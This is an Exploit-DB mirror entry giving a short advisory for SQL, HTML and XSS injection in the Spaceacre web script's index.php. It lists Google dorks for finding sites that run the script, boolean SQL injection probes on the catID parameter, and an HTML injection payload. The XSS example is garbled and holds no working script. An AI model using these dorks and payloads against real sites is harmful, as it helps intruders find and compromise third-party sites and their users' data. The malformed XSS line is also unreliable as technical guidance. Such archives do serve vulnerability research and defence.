exploit-db-mirror/exploits/php/webapps/12756.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

33 lines
No EOL
1.1 KiB
Text

-------------------------------------------------------------------------------------------
Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://www.spaceacre.com
Dork 1: inurl:cat1.php?catID= "Spaceacre"
Dork 2: intext:"Designed by Spaceacre"
-------------------------------------------------------------------------------------------
SQL Injection:
http://localhost/[path]/index.php?catID=1 and 1=2
http://localhost/[path]/index.php?catID=1 and 1=1
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.
-------------------------------------------------------------------------------------------